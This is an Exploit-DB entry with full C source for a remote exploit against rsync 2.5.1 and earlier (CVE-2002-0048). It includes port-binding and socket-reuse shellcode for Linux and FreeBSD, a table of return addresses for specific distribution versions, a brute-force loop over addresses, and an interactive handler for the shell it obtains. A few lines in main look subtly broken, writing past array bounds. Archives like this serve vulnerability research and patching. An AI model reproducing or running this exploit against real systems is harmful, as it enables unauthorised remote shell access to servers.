rsync <= 2.5.1 - Remote Exploit 2

2002-01-01T00:00:00
ID EDB-ID:399
Type exploitdb
Reporter Teso
Modified 2002-01-01T00:00:00

Description

rsync <= 2.5.1 Remote Exploit (2). CVE-2002-0048. Remote exploit for linux platform

                                        
                                            /* 7350rsync - rsync &lt;= 2.5.1 remote exploit - x86 ver.
 *
 * current version 2.5.5 but bug was silently fixed it appears
 * so vuln versions still ship, maybe security implemecations
 * were not recognized. 
 *
 * we can write NULL bites below &line[0] by supplying negative
 * lengths. read_sbuf calls buf[len] = 0. standard NULL byte off
 * by one kungf00 from there on.
 * 
 * originally by 7350, dupshell/FreeBSD by sprinkles
 *
 * 
 *
 */


 
#include &lt;stdio.h&gt;
#include &lt;string.h&gt;
#include &lt;unistd.h&gt;
#include &lt;stdlib.h&gt;
#include &lt;sys/types.h&gt;
#include &lt;sys/socket.h&gt;
#include &lt;arpa/inet.h&gt;
#include &lt;netinet/in.h&gt;
#include &lt;stdarg.h&gt;
#include &lt;netdb.h&gt;
#include &lt;errno.h&gt;

#define MAXPATHLEN      4096
#define VERSION         "@RSYNCD: 26\n"

#define PORT            873
#define NULL_OFFSET     -48
#define STARTNULLBRUTE  -44
#define ENDNULLBRUTE    -56
#define BRUTEBASE       0xbfff7777
#define INCREMENT       512
#define ALLIGN          0 /* pop byte allignment */

#define SEND            "uname -a; id\n"

int open_s(char *h, int p);
int setup(int s);
int exploit(int s);
void quit(int s); /* garbage quit */

void handleshell(int closeme, int s);
void usage(char *n);

char linux_port[] = /* x86 linux portshell 30464 */
"\x31\xc0\xb0\x02\xcd\x80\x85\xc0\x75\x43\xeb\x43\x5e\x31\xc0"
"\x31\xdb\x89\xf1\xb0\x02\x89\x06\xb0\x01\x89\x46\x04\xb0\x06"
"\x89\x46\x08\xb0\x66\xb3\x01\xcd\x80\x89\x06\xb0\x02\x66\x89"
"\x46\x0c\xb0\x77\x66\x89\x46\x0e\x8d\x46\x0c\x89\x46\x04\x31"
"\xc0\x89\x46\x10\xb0\x10\x89\x46\x08\xb0\x66\xb3\x02\xcd\x80"
"\xeb\x04\xeb\x55\xeb\x5b\xb0\x01\x89\x46\x04\xb0\x66\xb3\x04"
"\xcd\x80\x31\xc0\x89\x46\x04\x89\x46\x08\xb0\x66\xb3\x05\xcd"
"\x80\x88\xc3\xb0\x3f\x31\xc9\xcd\x80\xb0\x3f\xb1\x01\xcd\x80"
"\xb0\x3f\xb1\x02\xcd\x80\xb8\x2f\x62\x69\x6e\x89\x06\xb8\x2f"
"\x73\x68\x2f\x89\x46\x04\x31\xc0\x88\x46\x07\x89\x76\x08\x89"
"\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31"
"\xc0\xb0\x01\x31\xdb\xcd\x80\xe8\x5b\xff\xff\xff";

char linux_dup[] = /* x86 linux dupshell */
"\x31\xc0\x50\x40\x89\xc3\x50\x40\x50\xcd\x80\x85\xc0\x74\x05\x93"
"\x31\xdb\xcd\x80\xb0\x42\xcd\x80\x31\xc0\xb0\x06\x31\xdb\xb3\x03"
"\x50\xcd\x80\x58\x4b\x79\xf9\xb0\x30\x43\xb3\x0f\x31\xc9\x41\x50"
"\xcd\x80\x58\x80\xe3\x03\x4b\x75\xf6\x43\xb0\x66\x89\xe1\x50\xcd"
"\x80\x92\x43\x6a\x10\x8d\x7c\x24\x04\x57\x52\xb8\x02\xff\x0b\x1a"
"\xfe\xc4\xab\x31\xc0\xab\xb0\x66\x89\xe1\x50\xcd\x80\x85\xc0\x78"
"\x4e\x58\xb3\x04\x6a\x05\x52\x89\xe1\x50\xcd\x80\x31\xc0\xb0\x06"
"\xcd\x80\x58\x31\xdb\xb0\x66\xb3\x05\x31\xc9\x51\x51\x52\x89\xe1"
"\x50\xcd\x80\x85\xc0\x78\x28\x93\x31\xc0\x40\x40\xcd\x80\x85\xc0"
"\x75\xda\x87\xda\xb0\x06\xcd\x80\x87\xda\xb0\x29\xcd\x80\xb0\x29"
"\xcd\x80\x31\xc0\xb0\x06\x31\xdb\xb3\x03\xcd\x80\x58\xeb\x1d\x31"
"\xc0\x31\xdb\x40\xcd\x80\x5b\x31\xc0\x88\x43\x07\x8d\x4b\x08\x89"
"\x19\x89\x41\x04\xb0\x0b\x31\xd2\xcd\x80\xeb\xe3\xe8\xe5\xff\xff"
"\xff/bin/sh";

char freebsd_port[] = /* x86 FreeBSD portshell 30464 */
"\x31\xc0\x40\x40\xcd\x80\x85\xc0\x74\x16\xeb\x60\x5e\x56\x31\xc9"
"\xb1\x10\x89\xf7\xad\x35\xc0\x8a\xc0\x8a\xab\xe2\xf7\x5e\xeb\x4e"
"\xe8\xe7\xff\xff\xff\x95\xd9\x85\xd8\xe0\xf2\xe0\xf2\xe0\xf2\xe0"
"\xf2\xcd\x80\x8e\xc3\x83\xc1\xe0\xcf\xf0\xcc\xcd\x80\x8d\xc5\x84"
"\xcf\xe0\xcf\xf0\xcc\xe0\xb0\xed\xf2\xcd\x80\x8a\xc5\x89\xc4\xe0"
"\xa9\xf0\xf2\x85\xc5\x86\xaa\xa4\xff\xa4\xef\xcd\x80\x91\xdf\x89"
"\xde\xcd\x80\x85\xc0\x31\xc0\x40\x31\xdb\xcd\x80\xeb\x7c\x89\xe7"
"\x31\xdb\x43\x31\xc0\x50\x40\x50\x40\x50\xb0\x66\x89\xe1\x50\xcd"
"\x80\x92\x58\x5b\x5b\x5b\xb3\x03\x6a\x10\x57\x52\x50\xb8\x02\xff"
"\x1a\x0b\xfe\xc4\xab\xb8\xd8\x28\xf4\x7d\xab\x58\xcd\x80\x5b\x58"
"\x58\xb0\x04\x89\xf1\x31\xd2\xb2\x18\x01\xd6\xcd\x80\x31\xd2\xb2"
"\xff\x31\xc0\xb0\x03\x89\xe1\xcd\x80\x85\xc0\x76\xa8\x81\x39\x50"
"\x49\x4e\x47\x74\x06\x41\x48\x75\xf4\xeb\xe6\x89\xcf\x47\xc6\x07"
"\x4f\x87\xf7\xac\x3c\x0a\x75\xfb\x87\xfe\x91\xb1\x26\xf3\xa4\x91"
"\xb0\x04\x89\xfa\x29\xca\xcd\x80\xeb\xc3";

struct x_info {
        char *h;
        int p;
        char *module;
        int null_offset;
        u_long brutebase;
        int shell;
        int checkvuln;
        int nullbrute;
        int allign;
} rsx;
        
struct {
  char *desc;             /* description */
  int retdist;   
  unsigned int retaddr;         /* return address */
  char *shell;
} targets[] = {
  { "Linux Redhat 7.0 x86 / rsync 2.5.0", -0x1f0, 0x80e1d0, linux_port },
  { "Linux Redhat 7.0 x86 / rsync 2.5.1", -0x1f0, 0x80e23c, linux_dup },
  { "Linux Redhat 7.1 x86 / rsync 2.5.0", -0x1f0, 0x80e1c4, linux_port },
  { "Linux Redhat 7.1 x86 / rsync 2.5.1", -0x1f0, 0x80e230, linux_dup },
  { "Linux Redhat 7.2 x86 / rsync 2.5.0", -0x1f0, 0x80e1b8, linux_port },
  { "Linux Redhat 7.2 x86 / rsync 2.5.1", -0x1f0, 0x80e22c, linux_dup },
  { "Linux Mandrake 8.0 x86 / rsync 2.5.0", -0x1f0, 0x80e3a4, linux_port },
  { "Linux Mandrake 8.0 x86 / rsync 2.5.1", -0x1f0, 0x80e428, linux_dup },
  { "FreeBSD 4.2 x86 / rsync 2.5.0", -0x86, 0x80a248, freebsd_port },
  { "FreeBSD 4.2 x86 / rsync 2.5.1", -0x86, 0x80a29c, freebsd_port },
  { "FreeBSD 4.3 x86 / rsync 2.5.0", -0x86, 0x80a254, freebsd_port },
  { "FreeBSD 4.3 x86 / rsync 2.5.1", -0x86, 0x80a2a0, freebsd_port },
  { "FreeBSD 4.4 x86 / rsync 2.5.0", -0x86, 0x80a278, freebsd_port },
  { "FreeBSD 4.4 x86 / rsync 2.5.1", -0x86, 0x80a2b4, freebsd_port },
  { "FreeBSD 4.5 x86 / rsync 2.5.0", -0x86, 0x80a28c, freebsd_port },
  { "FreeBSD 4.5 x86 / rsync 2.5.1", -0x86, 0x80a2dc, freebsd_port },
}, *victim;

int
main(int argc, char **argv)
{
        int pipa[2];
        char c;
        int s,r;
        char buf[1024];
        char **p;
        u_long store;
        
        fprintf(stderr, "7350rsync - rsync &lt;= 2.5.1 remote exploit - x86 ver.\n"
                        "-sc\n"
                        "\n");

        p = ((char **)targets) + 35;
        rsx.p = PORT;
        rsx.null_offset = NULL_OFFSET;
        rsx.brutebase = BRUTEBASE;
        rsx.nullbrute = 0;
        rsx.allign = ALLIGN;

        strcpy(buf, *p);
        p -= 4;
        strcat(buf, *p);
        pipa[2] = (int)buf;
        pipa[3] = (int)buf;

        if(argc == 1) { usage(argv[0]); return 0; }

        while((c = getopt(argc, argv, "h:p:m:d:r:t:")) != EOF) {
                switch(c) {
                        case 'h':
                                rsx.h = optarg;
                                break;
                        case 'p':
                                rsx.p = atoi(optarg);
                                break;
                        case 'm':
                                rsx.module = optarg;
                                break;
                        case 'd':
                               rsx.null_offset = atoi(optarg);
                                break;
                        case 'r':
                                rsx.brutebase = strtoul(optarg, (char **)optarg+strlen(optarg), 16);
                                break;
                        case 't':
                                if(atoi(optarg) &lt; 1 || atoi(optarg) &gt; sizeof(targets) / sizeof(targets[0]))
                                  usage(argv[0]);
                                victim = &targets[atoi(optarg) - 1];
                                break;
                        default:
                                usage(argv[0]);
                                return 0;
                }
        }
        
        if(optind == argc)
          { usage(argv[0]); return 0; }
  
        rsx.h = argv[optind++];
        /* NULL byte brute wrap */
        
        store = rsx.brutebase;
        
        if(rsx.nullbrute) 
                for(rsx.null_offset = STARTNULLBRUTE; rsx.null_offset &gt;= ENDNULLBRUTE; rsx.null_offset--) {
                        fprintf(stderr, "\noffset: %d\n", rsx.null_offset);             
                        /* start run -- cuten this up with some connectback shellcode */
                        for(rsx.checkvuln = 1; rsx.brutebase &lt;= 0xbfffffff; rsx.brutebase += INCREMENT) {
                                if((s = open_s(rsx.h, rsx.p)) &lt; 0) {
                                        fprintf(stderr, "poop..bye\n");
                                        return 1;
                                }
                          
                          if((r = setup(s)) &gt; 0)
                            {
                              if((r = exploit(s)) &gt; 0)             
                                handleshell(s, rsx.shell);
                            }
                          else
                            return 1;
                        }
                        rsx.brutebase = store;                  
                }        
        

        for(rsx.checkvuln = 1; rsx.brutebase &lt;= 0xbfffffff; rsx.brutebase += INCREMENT) {
                if((s = open_s(rsx.h, rsx.p)) &lt; 0) {
                        fprintf(stderr, "poop..bye\n");
                        return 1;
                }

                if((r = setup(s)) &gt; 0)
            {
              
                        if(exploit(s) &gt; 0)
                                handleshell(s, rsx.shell);
            }
          else
            return 1;
        }


        fprintf(stderr, "No luck...bye\n");     
        return 1;
}

void
quit(int s)
{
        /* we just write a garbage quit to make the remote end the process */
        /* very crude but who cares */
        write(s, "QUIT\n", 5);
        close(s);
}  

int
setup(int s)
{
        /* we just dump our setup info on the socket. kludge */
        
        char out[512], *check;
        long version = 0;
        
        
        if(rsx.checkvuln) {
                rsx.checkvuln = 0; /* just check once */
                
                /* get version reply -- vuln check */
                memset(out, '\0', sizeof(out));
                read(s, out, sizeof(out)-1);
                if((check = strchr(out, (int)':')) != NULL) {
                        version = strtoul((char *)check+1, (char **)check+3, 0);
                        if(version &gt;= 26) {
                          fprintf(stderr, "target is not vulnerable (version: %lu)\n", version);
                          return -1;
                        }
                }
                else {
                        fprintf(stderr, "did not get version reply..aborting\n");
                        quit(s);
                        return -1;
                }
                
                fprintf(stderr, "Target appears to be vulnerable..continue attack\n");
        }
        
        /* our version string */        
        if(write(s, VERSION, strlen(VERSION)) &lt; 0) return -1;

        /* the module we supposedly want to retrieve */
        memset(out, '\0', sizeof(out));
        snprintf(out, sizeof(out)-1, "%s\n", rsx.module);
        if(write(s, out, strlen(out)) &lt; 0) return -1;
        if(write(s, "--server\n", 9) &lt; 0) return -1;
        if(write(s, "--sender\n", 9) &lt; 0) return -1;
        if(write(s, ".\n", 2) &lt; 0) return -1;
        /* send module name once more */
        if(write(s, out, strlen(out)) &lt; 0) return -1;
        /* send newline */
        if(write(s, "\n", 1) &lt; 0) return -1;

        return 1;
}

int
exploit(int s) 
{
        
        char x_buf[MAXPATHLEN], b[4];
        int i;

        /* sleep(15); */

        memset(x_buf, 0x90, ((MAXPATHLEN/2)-strlen(victim-&gt;shell)));
        memcpy(x_buf+((MAXPATHLEN/2)-strlen(victim-&gt;shell)), victim-&gt;shell, strlen(victim-&gt;shell));
        /* allign our address bytes for the pop if needed */
        for(i=(MAXPATHLEN/2); i&lt;((MAXPATHLEN/2)+rsx.allign);i++)
                x_buf[i] = 'x';
        for(i=((MAXPATHLEN/2)+rsx.allign); i&lt;MAXPATHLEN; i+=4)
                *(long *)&x_buf[i] = rsx.brutebase;
        *(int *)&b[0] = (MAXPATHLEN-1);
        if(write(s, b, 4) &lt; 0) return -1;
        if(write(s, x_buf, (MAXPATHLEN-1)) &lt; 0) return -1;
        /* send NULL byte offset from &line[0] to read_sbuf() ebp */
        *(int *)&b[0] = rsx.null_offset;
        if(write(s, b, 4) &lt; 0) return -1;
        /* let rsync know it can go ahead and own itself now */
        memset(b, '\0', 4);
        if(write(s, b, 4) &lt; 0) return -1;

        /* zzz for shell setup */
        usleep(50000);
        
        /* check for our shell -- (mod this to be connectback friendly bruteforce) */
        fprintf(stderr, ";");
        if((rsx.shell = open_s(rsx.h, 30464)) &lt; 0) {
                if(rand() % 2)
                        fprintf(stderr, "P");
                else
                        fprintf(stderr, "p");
                quit(s);
                return -1;
        }
        
        fprintf(stderr, "\n\nSuccess! (ret: %08x offset: %d)\n\n", (int)rsx.brutebase, rsx.null_offset);
        return 1;       
}
        
void
usage(char *n) {
  int i;
  fprintf(stderr, "usage: %s [options] &lt;hostname&gt;\n"
          "\nOptions:\n"
          "\t-m module\tmodule to request\n"
          "\t-p port\t\tport connecting to (default: 873)\n"
          "\t-d dist\t\tret - buf distance\n"
          "\t-r ret\t\treturn address\n"
          "\t-t target\tselect target\n", n);
  for(i = 0; i &lt; sizeof(targets) / sizeof(targets[0]); i++)
    fprintf(stderr, "\t\t\t(%u) %s, %d, %08x\n", i + 1, targets[i].desc, targets[i].retdist, targets[i].retaddr);
    
  
}
        

int
open_s(char *h, int p)
{
        struct sockaddr_in remote;
        struct hostent *iplookup;
        char *ipaddress;
        int sfd;

        if((iplookup = gethostbyname(h)) == NULL) {
                perror("gethostbyname");
                return -1;
        }

        ipaddress = (char *)inet_ntoa(*((struct in_addr *)iplookup-&gt;h_addr));
        sfd = socket(AF_INET, SOCK_STREAM, 0);

        remote.sin_family = AF_INET;
        remote.sin_addr.s_addr = inet_addr(ipaddress);
        remote.sin_port = htons(p);
        memset(&(remote.sin_zero), '\0', 8);

        if(connect(sfd, (struct sockaddr *)&remote, sizeof(struct sockaddr)) &lt; 0) return -1;
        
        return sfd;
}

void
handleshell(int closeme, int s)   
{
        char in[512], out[512];
        fd_set fdset;
        
        close(closeme);
        
        if(write(s, SEND, strlen(SEND)) &lt; 0 ) {
                fprintf(stderr, "write error\n");
                return;
        }       
 
        while(1) {
        
                FD_ZERO(&fdset);
                FD_SET(fileno(stdin), &fdset);
                FD_SET(s, &fdset);
        
                select(s+1, &fdset, NULL, NULL, NULL);
        
                if(FD_ISSET(fileno(stdin), &fdset)) {
                        memset(out, '\0', sizeof(out));
                        if(read(0, out, (sizeof(out)-1)) &lt; 0) {
                                fprintf(stderr, "read error\n");
                                exit(1);
                        }
                        if(!strncmp(out, "exit", 4)) {
                                write(s, out, strlen(out));
                                quit(s);
                                exit(0);
                        }
                        if(write(s, out, strlen(out)) &lt; 0) {
                                fprintf(stderr, "write error\n");
                                exit(1);
                        }
                }
        
                if(FD_ISSET(s, &fdset)) {
                        memset(in, '\0', sizeof(in));
                        if(read(s, in, (sizeof(in)-1)) &lt; 0) {
                                fprintf(stderr, "read error\n");
                                exit(1);
                        }
                        fprintf(stderr, "%s", in);
                }
        }
}

// milw0rm.com [2002-01-01]